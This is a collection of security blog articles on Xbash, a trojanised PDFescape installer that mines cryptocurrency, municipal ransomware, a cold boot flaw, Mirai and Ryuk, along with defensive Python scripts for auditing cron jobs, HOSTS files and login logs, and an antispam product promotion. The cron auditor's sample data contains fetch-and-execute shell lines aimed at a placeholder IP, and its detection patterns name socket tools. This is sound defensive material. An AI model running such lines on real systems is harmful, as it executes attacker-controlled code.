Is Xbash the Swiss Army Knife of Windows and Linux malware?


Recently discovered Xbash malware fits an emerging trend. It’s not just one type of malware, it’s at least four different types. It’s a worm! It’s ransomware! It’s a botnet! It’s a cryptominer! It slices and it dices, and it can be yours for four easy payments of two Bitcoins! Well, I haven’t seen infomercial-style ads on the Dark Web yet, nor have I seen Xbash for sale there. But you can catch my drift, eh?

It also targets both Windows and Linux. It’s not that there’s a Windows version and a Linux version… the same malware with the same payload will try different exploits and malicious activities based on whether the infected target is determined to be Windows or Linux. I use a Linux distro on my home office PC for my everyday work and leisure, but I’m an outlier. Rarely do consumers use Linux directly except perhaps for the Linux kernel on their Android devices. So targeting x86 versions of Linux suggests that the cyber attackers intend to focus on servers, including those which don’t run Windows Server. Attack Windows Server machines running applications like Active Directory and IIS, and attack Linux machines running applications like Apache, and you’ve got the large majority of internet servers around the world.

Originally developed in Python and ported into Linux ELF executables, Xbash tries to infect a system by exploiting weak passwords and well-known vulnerabilities, such as bugs in Redis services running on either major platform. Xbash appears to be malware that’s in constant development, so the cyber attackers’ command and control servers may transmit malware that’s designed to exploit new and different vulnerabilities in the future.

Researchers believe that the Iron Group, otherwise known as Rocke, is behind Xbash. Iron Group was originally discovered in 2017. The researchers wrote:

“Previously the Iron Group developed and spread cryptocurrency miners or cryptocurrency transaction hijacking trojans mainly intended for Microsoft Windows, with only a few for Linux. Instead, Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.”

Xbash is definitely an Advanced Persistent Threat. The cyber attackers scan IP addresses on both the internet and on intranets and they appear to be choosing their targets based on certain criteria. Unlike Iron’s previous types of cyber attacks, it seems that making money from ransomware and cryptomining is just one of many of their motives, and their other motives seem kind of mysterious. The cyber attackers really haven’t been making much money from Xbash so far, and it seems deliberate. The ransomware profits seem to only be about $6,000 USD worth of Bitcoin so far. Researcher Jen Miller-Osborn said:

“We agree that it seems odd. Though there is no way for the victims to know the attackers did not create copies of their files to return (as it claims to). It’s only once they’ve paid, and the attackers don’t restore the files, that the victims know their files are truly gone. The attackers may be happy enough to make whatever profits they can without the added step of having to store, track, and return the data.”

Money is certainly a factor, but perhaps the lust for power is an even greater one. Look at what they can leverage with their command and control servers and their ever growing botnet!

Here’s what Xbash does if it has determined that it has infected a Windows machine. Xbash goes through Redis and will deploy Windows attacks if a web server’s location in a file system is typical of Windows, such as in the Program Files folder. A Windows startup item will be created, and a malicious HTML or a Scriptlet file is downloaded from the command and control servers. From there, JavaScript or VBScript code will be used to execute PowerShell to run a malicious PE executable or PE DLL file. Once thoroughly inside a Windows target, further malicious code and instructions from the command and control servers make Xbash show its not-so-charming cryptomining and worm aspects.

If, by exploiting Redis, Xbash finds a web server in a location typical of a Linux operating system, such as the /usr/local/ folder, Tux mode commences! (Only I seem to call it Tux mode. I apologize to penguins everywhere.) A Linux cron job is created, and malicious JavaScript or VBScript payloads are downloaded from the command and control servers and executed. Xbash will look for databases to delete, such as MongoDB or MySQL databases. On a Linux system, Xbash will go on to show its equally not-so-charming ransomware and botnet aspects. Each and every side is utterly non-photogenic, darling.
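A defender-side check for the Linux persistence described above: this added audit script (my own example, not Xbash code or the cited researchers’ tooling) parses crontab text and flags jobs that download content from the network, or decode an embedded blob, and pipe it straight into a shell. Both crontab samples are constructed; the addresses, script names and the `@reboot` entry are assumptions.

```python
"""Audit cron entries for download-and-execute persistence.

Added example, not from the article or the researchers it cites. On Linux,
Xbash persists through a cron job that fetches its payload from the command
and control servers and runs it. This audit parses crontab text and flags
commands that pipe a network download (or a decoded blob) into a shell.
"""
import re

SCHEDULE_FIELDS = 5
# A job line is either a user crontab entry (5 schedule fields + command) or a
# system crontab entry (/etc/crontab, /etc/cron.d) with a user field in between.
SPECIAL_SCHEDULES = {"@reboot", "@hourly", "@daily", "@weekly",
                     "@monthly", "@yearly", "@annually"}

FETCHERS = re.compile(r"\b(curl|wget|fetch|python\d?\s+-c|perl\s+-e)\b", re.I)
SHELL_SINKS = re.compile(r"\|\s*(ba|da|z|k)?sh\b", re.I)
DECODER = re.compile(r"base64\s+(-d|--decode)\b", re.I)
NETWORK_REF = re.compile(r"(https?://|ftp://|\b\d{1,3}(\.\d{1,3}){3}\b)", re.I)
SOCKET_TOOLS = re.compile(r"\b(dev/tcp|nc|ncat|socat)\b")


def parse_crontab(text, system=False):
    """Yield (schedule, user, command) for each job line; user is None for user crontabs."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split()
        sched_len = 1 if parts[0] in SPECIAL_SCHEDULES else SCHEDULE_FIELDS
        if len(parts) <= sched_len + (1 if system else 0):
            continue  # schedule without a command
        schedule = " ".join(parts[:sched_len])
        if system:
            user, command = parts[sched_len], " ".join(parts[sched_len + 1:])
        else:
            user, command = None, " ".join(parts[sched_len:])
        yield schedule, user, command


def suspicious_reasons(command):
    """Return the list of reasons a cron command looks like a fetch-and-run dropper."""
    reasons = []
    piped_to_shell = SHELL_SINKS.search(command) is not None
    if FETCHERS.search(command) and piped_to_shell:
        reasons.append("downloader piped to shell")
    if DECODER.search(command) and piped_to_shell:
        reasons.append("decoded blob piped to shell")
    if NETWORK_REF.search(command) and piped_to_shell:
        reasons.append("remote content executed")
    if SOCKET_TOOLS.search(command):
        reasons.append("raw socket tool")
    return reasons


def audit(text, system=False):
    """Return one finding dict per suspicious job in the crontab text."""
    findings = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = suspicious_reasons(command)
        if reasons:
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


# Constructed samples (assumed content, not real crontabs).
USER_CRONTAB = """\
# constructed sample of a user crontab
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh --quiet
*/10 * * * * curl -fsSL http://203.0.113.9/pm.sh | sh
@reboot echo "aGVsbG8K" | base64 -d | bash
"""

SYSTEM_CRONTAB = """\
# constructed sample of /etc/crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * www-data wget -q -O - http://203.0.113.9/x.sh | bash
30 4 * * * redis /usr/bin/redis-cli BGREWRITEAOF
"""

if __name__ == "__main__":
    for finding in audit(USER_CRONTAB) + audit(SYSTEM_CRONTAB, system=True):
        print(finding)
```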

So Xbash doesn’t seem to be a gold digger, but it will inevitably try to exploit many new vulnerabilities in the future and try a variety of different activities so that the Iron Group can have internet servers around the world under their thumb. Whatever forms Xbash takes in the future, using much more secure passwords in your OSes, web servers, and web databases, and installing the latest patches, will certainly make it more difficult for your network to become the latest Xbash victim.

How To Stop Junk Email


With the online space evolving into a global marketplace, businesses from around the world are trying to capitalise on the internet to reach new customers and to engage with existing ones. Besides this benefit, the internet has also provided room for online fraudsters to entice unwary users into phishing scams and make them download malware.


Online fraudsters are skilled impersonators who craft e-mails that appear to come from a legitimate sender. It is therefore necessary to steer clear of the online risks posed by these attackers. Keep reading to learn some of the essential things you need to do as a responsible email user.

Easy Ways To Stop Junk or Spam Email

Train The Filter

Generally, we all tend to delete the spam in our inbox when we find it. Instead, select the particular email and report to your mail client that it is spam. For example, on the Gmail website, click the Report spam button in the toolbar.

Stop Answering Spam

When a message is recognized as spam even before it is opened, don’t open it. If it is opened unknowingly, close it. Never click a link in, or download a file from, that message.

Hide The Email Address

Your email address is your personal information, so never share it online or with unknown people. The more it gets popular, the more spam you’re going to get.

Make Use Of Anti-spam Filter

Today, all major security programs come packing an anti-spam filter. So try installing one that can help you get rid of the unnecessary troubles. You can try Comodo Dome Anti-spam which has got the top score for catching spam and integrating with Outlook.

Change The Email Address

If your email inbox is bombarded with spam then the best option is to change your email address to stay away from the vexation. After the switchover, remember not to click or subscribe to unwanted emails. Remember to inform your legitimate contacts about the change, and you would need to keep both addresses for a few months.

Stop Spam Email Using Comodo Dome Anti-spam

Comodo Spam Blocker blocks spam emails effectively regardless of the format, content or language of the message and thereby increases your employees’ efficiency. Its smart analysis provides quick and continuous protection during outbreaks. Moreover, you can get it up and running in minutes. With an intuitive interface, it makes ongoing spam management simple and straightforward.

The free spam blocker software Comodo Dome Antispam is capable of preventing phishing emails, spam, and infected attachments from reaching the inbox and putting the company at risk through a user’s erroneous double-click. The defense mechanism of Comodo Dome Antispam packs built-in containment technology and uses spam filters and content analysis engines to identify and block unwanted emails from accessing the network.

Key Features Of Comodo Dome Antispam

  •    Security and Usability: Users can open, execute, and use email attachments without hesitation, as there is no risk of infection from malicious files.
  •    Granular Control: Centralized control and group-based email policies guarantee system and network safety.
  •    Flexible Deployment: Choose the deployment that fits your needs; available as single-tenant, on-premises, and multi-tenant hosted.

Comodo’s patented containment technology blocks spam emails from entering the network and successfully wards off other infiltration attempts through its signature-based anti-spam software. The infected files are treated in a defined operating system environment, thus controlling the resources and the spread of infection.

If you are in search of a good free spam blocker software solution, look no further than Comodo Dome Anti-spam!


Evil clone to attack users: how cybercrooks use legitimate software to spread cryptominers


Cryptomining has become today’s gold rush, and cybercriminals have been seized by it too. They invent ever more cunning gimmicks to infect users’ machines and make them mine cryptocurrency for the attackers’ profit. The cybercrime recently detected by Comodo specialists is a striking illustration of this process. To infect users all over the world, the attackers used a legitimate application installer, a replicated server and… well, let’s not jump ahead, but walk through the whole attack chain from beginning to end.

Here is PDFescape software. Many people use it to edit, annotate or fill in forms in .PDF files. It’s highly likely you have used this or similar software too.

Of course, it’s legitimate and secure… at least it was until recently, when a cybercriminal had the idea of using it to spread malware.

What is especially interesting is that the malicious hackers didn’t just try to mimic PDFescape. They went further and decided to create its evil clone.

Just think of the attack’s scope: the perpetrators recreated the software partner’s infrastructure on a server under their control. Then they copied all the MSI (Windows installer package) files and placed them on that server. The cloned software was an exact replica of the original… except for one small detail: the attackers decompiled and modified one of the MSI files, an Asian font pack, and added a malicious payload containing coinmining code.


This black magic turns the original PDFescape installer into a malicious one.

The modified installer redirects users to the malicious website and downloads the payload with the hidden file.

As you can see, the hacked installer does not carry the original digital signature.

But how exactly does this malware do harm? Let’s see.

Dynamic Analysis

When a victim installs this pdfescape-desktop-Asian-and-extended-font-pack, the malicious binary xbox-service.exe is dropped into the Windows system32 folder and executes the malicious DLL via rundll32. Disguised as setup.log, the malicious DLL hides in the Windows folder.

Here is the process flow.

The pdfescape-desktop-Asian-and-extended-font-pack.msi is installed by the command line “C:\Windows\System32\msiexec.exe” /i

Then the installer drops xbox-service.exe in the system32 folder.

The dropped xbox-service.exe starts working as a service:


Then it runs the malicious DLL, under the name setup.log, via rundll32 with the command line:

rundll32 C:\Windows\System32\setup.log.dll

Static Analysis

The modified MSI has an embedded malicious DLL. This DLL, in turn, contains two executable files in its resources.

Thus, the DLL file runs the malicious process xbox-service.exe.

Another interesting aspect of the DLL payload is that, during the installation stage, it tries to modify the Windows HOSTS file to prevent the infected machine from communicating with the update servers of various PDF-related apps and security software. In this way the malware tries to avoid remote cleaning and remediation of affected machines.

The HOSTS file modified by the malicious DLL
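To detect the HOSTS-file tampering just described, here is an added Python check (my own example, not Comodo’s code or the malware’s) that parses HOSTS text and reports watched update hosts that resolve to a loopback or unspecified address. The sample HOSTS content and the example-av.com / example-pdf.com watch-list entries are constructed; windowsupdate.com is a real Microsoft update domain.

```python
"""Flag HOSTS-file entries that sink-hole update or security-vendor domains.

Added example, not Comodo's code. The PDFescape clone rewrites the Windows
HOSTS file so that update servers of PDF tools and security products resolve
to an unroutable address. Comparing the file against a short list of hosts
that must never be overridden surfaces that tampering.
"""
import ipaddress

# Constructed watch-list: domains (and their subdomains) an endpoint must be
# able to reach for updates. A real deployment lists the vendor hosts it uses.
WATCHED_DOMAINS = (
    "example-av.com",            # assumed security vendor
    "updates.example-pdf.com",   # assumed PDF-tool update host
    "windowsupdate.com",         # real Microsoft update domain
)


def parse_hosts(text):
    """Yield (address, hostname) pairs from HOSTS text, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        addr, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue  # malformed address field; not a usable mapping
        for name in names:
            yield addr, name.lower()


def is_sinkhole(addr):
    """True if the address black-holes a name (loopback or unspecified)."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_unspecified


def is_watched(name, watched=WATCHED_DOMAINS):
    """True if name equals a watched domain or is a subdomain of one."""
    return any(name == w or name.endswith("." + w) for w in watched)


def find_blocked_updates(text, watched=WATCHED_DOMAINS):
    """Return [(hostname, address)] for watched hosts mapped to a sinkhole."""
    findings = []
    for addr, name in parse_hosts(text):
        if name == "localhost":
            continue  # the one loopback mapping every HOSTS file carries
        if is_sinkhole(addr) and is_watched(name, watched):
            findings.append((name, addr))
    return findings


# Constructed sample resembling the tampering described in the article.
SAMPLE_HOSTS = """\
# constructed sample HOSTS file
127.0.0.1       localhost
::1             localhost
0.0.0.0 update.example-av.com
0.0.0.0 liveupdate.example-av.com
127.0.0.1 updates.example-pdf.com   # stops the PDF tool from updating
192.168.1.20 printer.corp.example
"""

if __name__ == "__main__":
    for host, addr in find_blocked_updates(SAMPLE_HOSTS):
        print(f"{host} is sink-holed to {addr}")
```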

And finally, inside the DLL we found the main evil: a malicious browser script. The script has an embedded link to


Let’s follow the link and see where it goes:


As is now clear, it downloads the JavaScript coinminer known as CoinHive, which malicious hackers covertly use to infect hosts around the world. You can find more details about it in the Comodo Q1 2018 and Comodo Q2 2018 reports.


So all that fuss was to infect users with a cryptominer?! Yes, that’s right. And it reminds us that we shouldn’t take this kind of malware lightly.

“As we mentioned in the Comodo Q1 2018 and Q2 2018 Global Threat Reports, cryptominers remain one of the most dangerous threats in the cybersecurity space,” comments Fatih Orhan, the Head of Comodo Threat Research Labs. “Some people consider cryptominers a not-so-serious threat because they do not steal information or encrypt users’ files, but this mistake can be very costly for them in reality. Cryptominers are turning into sophisticated malware that can crash users’ systems or capture all the IT resources of an infected enterprise and make them work only for mining cryptocurrency for cybercriminals. Thus, financial losses from a cryptominer attack can be as devastating as those of other malware types. Cryptominers will continue to become more and more devious, with their dangerous abilities growing. And the story of the modified installer detected by our analysts is clear evidence of it.”

According to the Comodo stats, this malicious file hit 12,810 users in 100 countries around the world. Below are the top ten affected countries.

countries attack

In general, from April to August 2018, Comodo specialists detected 146,309 JavaScript-based coinminers with unique SHAs.


Live secure with Comodo!


Ransomware cripples an Alaskan town


It’s bad enough when ransomware infects an individual’s PC or smartphone. Not having access to locally stored files can really throw a wrench in the works of a person’s life. But when it comes to consumer ransomware, usually only one person is inconvenienced per infection.

We know that ransomware attacks enterprise systems too. Public services in particular are a juicy target for cyber attackers deploying ransomware. Ransomware can be really destructive to embedded/IoT devices because they’re computers inside appliances and machines that have practical use in everyday life – refrigerators, MRI scanners, you-name-it. But also systems that municipalities use to support the lives of their citizens are deployed on more conventional types of computers – desktop, servers, and cloud instances. When ransomware impacts municipal computer networks, the effects can get ugly.

On July 23rd, Matanuska-Susitna, a borough near Anchorage, Alaska, ground to a halt. Valdez, Alaska was affected as well.

“The cyber attack has caused major disruption in Borough services and loss of productivity, which may continue for a prolonged time,” said Matanuska-Susitna politician Ted Leonard.

Computer systems supporting libraries, swimming pools, e-commerce, the local landfill, animal care, and collections all ceased functionality.

From Matanuska-Susitna IT Director Eric Wyatt’s report:

“Almost all Windows based production servers have been encrypted, this includes our domain, email (Exchange), Govern, Logos, TRIM, SharePoint (intranet and eCommerce), GIS, SQL databases, S:\ drive file shares (L:\, M:\, P:\) and even our backup and Disaster Recovery (DR) servers.

The backup and DR servers had been engineered in a way that no known threats would affect. This new threat has always been considered a theoretical exploit. To date, neither our local network engineering consultant nor the international vendors: Cisco, Dell, Commvault, that they represent, have seen this exploit developed and used. Further, our backup and DR model uses a multi-tiered approach to data protection, which appears to have saved some portion of our data, even under this sophisticated attack.

The phone system (Mitel) was encrypted, we lost some functionality but most direct lines continued to work as long as the phone was powered on.

The door lock card swipe system (Lenel) has also been encrypted but will continue to function in the last known good condition.

Though it initially appeared that our data was a complete loss, we have recently recovered data from the shared drives, Logos, Govern, TRIM, GIS and more.

eMail (Exchange) does appear to be completely unrecoverable.”

Completely unrecoverable… ouch. Matanuska-Susitna workers had to do their jobs with hand receipts and typewriters. The last time I saw a typewriter in use was during my 1980s early childhood, and even that was an electronic Smith Corona model with a bright green monitor, not a mechanical wonder from the early 20th century. What kind of typewriters did they have to use?

The attack was deployed with BitPaymer ransomware, the Emotet Trojan, and a human cyber attacker directly penetrating Matanuska-Susitna’s networks. The exploits leveraged zero-day vulnerabilities but used familiar components. BitPaymer may have been on the Borough’s computers as early as May 3rd, but the encryption timebomb was dated for July 23rd.

BitPaymer ransomware was behind an attack on Scottish hospitals in August 2017, about a year ago.

Atlanta, Georgia can sympathize with Matanuska-Susitna. Back in March of this year, their networks were hit by SamSam, a ransomware strain that impacted Indiana’s Hancock Health in January. Among the functions stopped in Atlanta’s SamSam attack were utility billing systems, police and city worker reporting, parking ticket payment, sewer infrastructure requests, and the digital backbone of the city’s courts of law.

According to a confidential report covered by the Atlanta Journal-Constitution on August 1st, the incident response to March’s SamSam attack could end up costing the city $17 million. That figure doesn’t include speculative losses from the downtime of Atlanta’s computer systems, just fixing the damage done. Apparently Atlanta’s computers hadn’t been security patched for months.

What you need to know about the newest Cold Boot exploit



Kim Crawley

The cybersecurity industry is all abuzz over a recently discovered and very scary exploit, a new and devastating Cold Boot vulnerability. Cold Boot attacks occur when sensitive data is left in a computer’s RAM for cyber attackers to copy because the machine wasn’t shut down properly, for example after an ACPI cold boot or a hard shutdown. Now a new cold boot exploit has been found and people are understandably concerned. There’s good news and bad news about it.

Don’t you want to read the good news first? Here it is. Cold Boot attacks have been largely prevented through security hardening since their initial discovery in 2008. Most PCs that OEMs have produced since then are careful to remove data from RAM during the shutdown process. And in order for a cyber attacker to exploit this recently discovered Cold Boot vulnerability, they need physical access to the target machine and about five minutes to perform the attack. So this attack cannot be conducted over the internet and the cyber attacker can’t do it instantaneously. There’s a bit of a time window to catch them in the process.

Now’s the time for me to be a Debbie Downer. Here’s the bad news. This newly discovered vulnerability affects the majority of PCs, including those produced after 2008. It even affects PCs that have been produced this year. Most modern laptops are vulnerable, including models from Lenovo, Dell, and even Apple. Laptops from HP, Toshiba, Sony, and many other popular OEMs are probably affected too. The only recent MacBooks and iMacs that are safe from the recently discovered exploit are those with a T2 chip. According to Apple, iMac Pros and MacBook Pros from 2018 have the T2 chip. If your Apple Mac model doesn’t have “Pro” in its name, or if it does have “Pro” in its name but it predates 2018, it’s probably still Cold Boot vulnerable. The data that a cyber attacker can acquire from an affected Windows OEM or Mac’s RAM could contain very, very sensitive information, such as authentication data and cryptographic keys – even if you encrypt your hard drive through your operating system. That sort of data can be used by a cyber attacker to help establish administrative access to your computer and possibly to your local network as well. There are many possibilities for destruction if that sort of data falls into the wrong hands. A cyber attacker can acquire the data with physical access to your machine if you put it into sleep mode. Only a total shut down or hibernate may be safe. The security hardening performed since 2008 really only works reliably if a total shutdown or hibernate is performed. That’s the big, scary news in a nutshell.

Security consultant Olle Segerdahl said:

“It’s not exactly easy to do, but it’s not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out. It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”

Security hardening against this exploit is going to be really tricky, a major uphill battle. There’s no patch so far. Segerdahl added:

“When you think about all the different computers from all the different companies and combine that with the challenges of convincing people to update, it’s a really difficult problem to solve easily. It will take the kind of coordinated industry response that doesn’t happen overnight. In the meantime, companies will need to manage on their own.”

Until a patch can be deployed, security researchers recommend that all affected PCs be put into hibernate or shut down when unattended by the user. Windows users should be required to enter their BitLocker PIN when they boot or restart their PCs. Microsoft has a page with a list of BitLocker countermeasures that can be deployed to make Windows PCs a little more secure.

Olle Segerdahl presented these worrisome findings during a Swedish conference on September 13th. More information may be presented at Microsoft’s security conference on September 27th.

Mirai Strikes Back

All it took was one malware to form a botnet that left the domain-based internet inaccessible to many on the eastern coast of the United States and in Europe on October 21st, 2016. It was the largest cyber attack to cause internet downtime in US history. We’re coming up on the second anniversary of the notorious Mirai botnet.

A botnet is formed when many computers are infected with zombie malware that lets a central server control them and use their collective computing power and bandwidth to conduct cyber attacks. Botnets are a popular way to conduct distributed denial of service (DDoS) attacks, which can take down all kinds of networking appliances and internet servers. Denial of service attacks work by overwhelming a network target with packets until its memory buffers are filled beyond capacity and it’s forced to shut down. The distributed part means that many computers are coordinated in conducting the denial of service attack.

Mirai searched the internet for IoT (Internet of Things) devices through the Telnet port. If a device had an open Telnet port, the Mirai malware would try a combination of 61 known default username and password combinations in order to find one that would allow it to maliciously authenticate. If one combination worked, the device was added to the massive and growing Mirai botnet. Most of the devices infected by Mirai malware were internet connected closed circuit TV cameras and routers.
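On the device side, the credential stuffing described above shows up as a burst of failed Telnet logins from one source that cycles through several usernames. The following added example (mine, not Comodo’s or Mirai’s code) flags that pattern in login logs; the log lines are constructed and mimic util-linux `login` syslog output, so the regex is an assumption to adapt to your device’s telnetd.

```python
"""Spot Mirai-style Telnet credential stuffing in device login logs.

Added example, not from the article. Mirai tried 61 default username and
password pairs against every device with an open Telnet port. On the device
that appears as many failed logins from one source in a short window, often
across several usernames. A per-source sliding window separates that burst
from a slow trickle of ordinary typos.
"""
import re
from collections import defaultdict
from datetime import datetime

# Assumed format, modelled on util-linux `login` messages in syslog.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ login\[\d+\]: "
    r"FAILED LOGIN \d+ FROM (?P<src>\S+) FOR (?P<user>[^,]+),"
)


def parse_failures(lines, year=2016):
    """Return [(timestamp, source, username)] for each failed-login line.

    syslog timestamps carry no year, so the caller supplies one.
    """
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        out.append((ts, m["src"], m["user"].strip()))
    return out


def find_bruteforce(lines, max_failures=5, window_seconds=60):
    """Flag sources with more than max_failures failures inside one window.

    Returns {source: {"failures": total, "users": sorted distinct usernames}}.
    """
    per_src = defaultdict(list)
    for ts, src, user in sorted(parse_failures(lines)):
        per_src[src].append((ts, user))
    flagged = {}
    for src, events in per_src.items():
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > max_failures:
                flagged[src] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                }
                break
    return flagged


# Constructed sample: one scanner burst, one admin typo, one slow trickle.
SAMPLE_LOG = """\
Oct 21 09:12:01 cam01 login[412]: FAILED LOGIN 1 FROM 203.0.113.5 FOR root, Authentication failure
Oct 21 09:12:03 cam01 login[412]: FAILED LOGIN 2 FROM 203.0.113.5 FOR root, Authentication failure
Oct 21 09:12:05 cam01 login[413]: FAILED LOGIN 1 FROM 203.0.113.5 FOR admin, Authentication failure
Oct 21 09:12:07 cam01 login[413]: FAILED LOGIN 2 FROM 203.0.113.5 FOR admin, Authentication failure
Oct 21 09:12:09 cam01 login[414]: FAILED LOGIN 1 FROM 203.0.113.5 FOR support, Authentication failure
Oct 21 09:12:11 cam01 login[414]: FAILED LOGIN 2 FROM 203.0.113.5 FOR support, Authentication failure
Oct 21 09:30:00 cam01 login[501]: FAILED LOGIN 1 FROM 192.168.1.10 FOR operator, Authentication failure
Oct 21 09:30:40 cam01 login[501]: LOGIN ON pts/0 BY operator FROM 192.168.1.10
Oct 21 11:00:00 cam01 login[600]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
Oct 21 12:00:00 cam01 login[601]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
Oct 21 13:00:00 cam01 login[602]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
Oct 21 14:00:00 cam01 login[603]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
Oct 21 15:00:00 cam01 login[604]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
Oct 21 16:00:00 cam01 login[605]: FAILED LOGIN 1 FROM 198.51.100.7 FOR root, Authentication failure
"""

if __name__ == "__main__":
    for src, info in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['failures']} failures, users tried: {info['users']}")
```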

The first major internet server attack conducted by the Mirai botnet targeted OVH, a French cloud services provider. Two DDoS attacks with a bandwidth of up to 799 Gbps took down some OVH-hosted Minecraft servers. By then, the botnet consisted of 145,607 devices.

Comodo malware researcher Venkat Ramanan has been watching the Mirai botnet since its discovery. “The first incident of the Mirai botnet was spotted in August 2016. Millions of IoT device attacks were noted during the same year. Mirai’s cyber criminal gang uploaded Mirai’s source code on Github in October 2016.”

On October 21st 2016, the Mirai botnet hit the Dyn network of DNS servers. DNS servers resolve domain names to IP addresses so that human beings don’t have to remember those IP addresses in order to access internet services. Dyn is a widely used DNS provider, so its downtime made domain-based internet use inaccessible to lots of people. Dyn released its analysis of the attack after its incident response:

“On Friday October 21, 2016 from approximately 11:10 UTC to 13:20 UTC and then again from 15:50 UTC until 17:00 UTC, Dyn came under attack by two large and complex Distributed Denial of Service (DDoS) attacks against our Managed DNS infrastructure. These attacks were successfully mitigated by Dyn’s Engineering and Operations teams, but not before significant impact was felt by our customers and their end users.

The first attack began around 11:10 UTC on Friday October 21, 2016. We began to see elevated bandwidth against our Managed DNS platform in the Asia Pacific, South America, Eastern Europe, and US-West regions that presented in a way typically associated with a DDoS attack.

This attack has opened up an important conversation about internet security and volatility. Not only has it highlighted vulnerabilities in the security of ‘Internet of Things’ (IoT) devices that need to be addressed, but it has also sparked further dialogue in the internet infrastructure community about the future of the internet. As we have in the past, we look forward to contributing to that dialogue.”

The attack not only brought attention to how vulnerable IoT devices can be, but it also served as an excellent reminder to always change the default settings on your internet-connected devices, especially usernames and passwords!

Well now, Mirai is back and badder than ever. One of the challenges of developing IoT malware is how very different IoT devices are from each other. There’s tremendous diversity in IoT devices because they can manifest as anything from industrial controllers to medical devices, from children’s toys to kitchen appliances. They can run a multitude of different operating systems and embedded software, so malicious code that can exploit the vulnerabilities on one particular device can’t usually exploit most other devices. But with the help of the Aboriginal Linux project, the latest Mirai malware can exploit a wide range of IoT devices. A malware researcher discovered it in the wild:

“At the end of July, I came across a live remote server hosting multiple malware variants, each for a specific platform. As with many Mirai infections, it starts by firing a shell script on a vulnerable device. That shell script sequentially tries downloading and executing individual executables one by one until a binary compliant with the current architecture is found…

While this is similar behavior to the Mirai variants we’ve seen so far, what makes it interesting is the compiled binary. These variants have been created by leveraging an open-source project called Aboriginal Linux that makes the process of cross-compilation easy, effective, and practically fail-proof. It should be noted that there is nothing malicious or wrong with this open-source project, the malware authors are once again leveraging legitimate tools to supplement their creations, this time with an effective cross compilation solution.

Given that the existing code base is combined with an elegant cross-compilation framework, the resultant malware variants are more robust and compatible with multiple architectures and devices, making it executable on a wide variety of devices ranging from routers, IP cameras, connected devices, and even Android devices.”

If you have IoT devices that run a version of Linux or Android and you want to harden them against this latest version of Mirai, here’s what you can do. Disable Telnet logins if possible, and block the Telnet port altogether. If you’re using default usernames and passwords, change them! Disable Universal Plug and Play (UPnP) if you can, and deploy wired Ethernet in lieu of WiFi if you’re able to. If you need to use WiFi, only connect to encrypted WiFi (WPA2 or the upcoming WPA3 is best), and use a complex password for your wireless access point.

Ryuk Ransomware Authors: “Be thankful you’re hacked by serious people.”


Look out, SamSam. There’s a new ransomware in town that’s very carefully targeting enterprises and businesses. Say hello to Ryuk. In the first two weeks after its August debut, the ransomware made its cyber attackers over $640,000 USD. By contrast, SamSam has taken about three years to make its author about $6 million USD.

While the people behind Ryuk are on their way to their first million dollars worth of Bitcoin, they also think you should be very honored to be attacked by them. This is some of what their ransom note says:

“Gentlemen! Your business is at serious risk. There is a significant hole in the security of your company… You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks… The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5BTC… Nothing personal just business.”

Cryptocurrency values fluctuate wildly, but when I checked the Bitcoin to US dollar exchange rate on August 23rd, a Bitcoin was $6,410.74. So apparently each day an organization delays costs them more than a few grand. The main ransom amount demanded has varied from 15 to 50 Bitcoin, that’s about $96,000 to $320,000. Because these attacks are so targeted, I believe they may be adjusting their demand according to what they think their target can pay.

Like most other ransomware that targets the enterprise, Ryuk exploits Windows vulnerabilities. But unlike WannaCry, there isn’t one specific vulnerability that it always targets first, such as that notorious Windows SMB exploit. Ryuk’s cyber attackers will spend time mapping their targets’ networks and maliciously acquiring credentials. As Microsoft patches Windows and Cisco patches networking devices, the Ryuk team will probably find new vulnerabilities to exploit. And they do it all just for you!

It’s hypothesized that the people behind Ryuk are either North Korea’s Lazarus Group, or a group that has learned from Lazarus’ work. That’s because Ryuk resembles HERMES in many ways. HERMES was discovered in October 2017 when it was used against Taiwan’s Far Eastern International Bank to steal about $60 million through SWIFT. It’s strongly believed that Lazarus conducted that attack. The code used in Ryuk to place a marker to check that a file has been encrypted is identical to the code used for the same function in HERMES. Both Ryuk and HERMES are very selective of what they encrypt in a Windows system. They’ll encrypt what the target really needs, but not what they need in order to read the ransom note and make the Bitcoin payment. And they both go about the encryption process the same way, whitelisting specific Windows folders, writing a file called “window.bat” to each folder, and a script to delete shadow volumes and backup files.

